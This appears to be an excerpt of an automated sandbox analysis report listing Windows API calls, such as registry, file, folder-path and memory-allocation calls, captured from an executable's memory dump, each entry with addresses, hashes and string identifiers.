                                                            • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                            • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                            • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
                                                            • RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$Unwind
                                                            • String ID:
                                                            • API String ID: 1141220122-0
                                                            • Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                            • Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
                                                            • Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                            • Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: TWindowDisabler-Window
                                                            • API String ID: 716092398-1824977358
                                                            • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                            • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                            • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 47109696-1019749484
                                                            • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                            • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            Strings
                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                            • API String ID: 71445658-1109908249
                                                            • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                            • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                            • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID:
                                                            • API String ID: 2066263336-0
                                                            • Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                            • Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                            • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                            • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                            • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                            • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                            • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                            • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
                                                            • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                            • Opcode Fuzzy Hash: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
                                                            • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
                                                            • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                            • Opcode Fuzzy Hash: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
                                                            • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042B852
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                            • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID:
                                                            • API String ID: 530164218-0
                                                            • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                            • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                            • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                            • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                            • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$DestroyLong
                                                            • String ID:
                                                            • API String ID: 2871862000-0
                                                            • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                            • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                            • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                            • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                            • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                            • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                            • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                            • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                            • Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                            • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                              • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                              • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                            • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                            • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                            • Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                            • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                            • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                            • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                            • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                            • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                            • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                            • Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                            • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 006257BC
                                                            • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                            • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
